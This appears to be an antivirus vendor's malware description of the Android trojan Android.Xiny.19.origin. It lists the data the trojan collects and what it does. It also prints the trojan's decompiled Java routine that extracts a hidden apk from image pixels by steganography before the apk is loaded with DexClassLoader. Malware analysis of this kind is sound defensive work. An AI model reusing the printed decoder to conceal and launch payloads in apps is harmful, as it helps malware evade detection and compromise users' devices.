SHA1: 6895c3258031b5750ce19aa7b67dd92db313e1be

It is a Trojan for Android devices that is embedded into various games published on Google Play.

Android.Xiny.19.origin sends the following information to the command and control server:

IMEI identifier

IMSI identifier

Information about the mobile operator

Presence of a memory card in a device

Country

Language

MAC address

Version of the operating system

Package name and a version of an application that the Trojan is incorporated into

Presence of the malicious application in the system folder

The Trojan can execute the following actions:

Displays annoying advertisements

Downloads applications and prompts a user to install various software

Installs and deletes programs if root access is available on a device

Launches arbitrary apk files hidden in images received from the C&C server

The way apk files are launched looks as follows: Android.Xiny.19.origin downloads a specially created image, which contains the corresponding file object hidden with the help of steganography, from the server. Then the Trojan retrieves the apk file using a special algorithm:

Code Expand source package com.wch.c_direct.encrypt.logic; import android.graphics.Bitmap; import android.graphics.BitmapFactory; import com.wch.c_direct.logic.a; import java.io.InputStream; import java.util.Arrays; public final class BitmapDecryptor { public static byte[] decrypt(InputStream inputStream) { int i5; int i = 4; int i1 = 8; a.a(); Bitmap bitmap0 = BitmapFactory.decodeStream(inputStream); bitmap0.setHasAlpha(true); byte[] buffer1 = new byte[i1]; int i2 = 0; int i3 = 0; int i4 = 0; while(i2 < buffer1.length) { i5 = bitmap0.getPixel(i4, i3); buffer1[i2] = ((byte)(i5 >> 16 & 15)); if(i2 + 1 < i1) { buffer1[i2 + 1] = ((byte)(i5 >> 8 & 15)); } if(i2 + 2 < i1) { buffer1[i2 + 2] = ((byte)(i5 & 15)); } ++i4; if(i4 == bitmap0.getWidth()) { ++i3; i4 = 0; } i2 += 3; } byte[] buffer2 = BitmapDecryptor.a(buffer1); i2 = 0; i3 = 0; while(i2 < i) { i3 = i3 << 8 | buffer2[i2] & 255; ++i2; } buffer1 = new byte[i3 * 8 / 4]; i2 = 0; i3 = 0; i4 = 0; while(i2 < buffer1.length) { i5 = bitmap0.getPixel(i4, i3); buffer1[i2] = ((byte)(i5 >> 16 & 15)); if(i2 + 1 < buffer1.length) { buffer1[i2 + 1] = ((byte)(i5 >> 8 & 15)); } if(i2 + 2 < buffer1.length) { buffer1[i2 + 2] = ((byte)(i5 & 15)); } ++i4; if(i4 == bitmap0.getWidth()) { ++i3; i4 = 0; } i2 += 3; } byte[] decrypted = BitmapDecryptor.a(buffer1); bitmap0.recycle(); return Arrays.copyOfRange(decrypted, i, decrypted.length); } private static byte[] a(byte[] inBuffer) { a.a(); byte[] outBuffer = new byte[inBuffer.length / 2]; int i; for(i = 0; i < outBuffer.length; ++i) { int i1; for(i1 = 0; i1 < 2; ++i1) { outBuffer[i] = ((byte)(outBuffer[i] << 4 | inBuffer[i * 8 / 4 + i1])); } } return outBuffer; } }

After that, the malicious application loads the file into RAM of the infected device using the DexClassLoader class.

News about the Trojan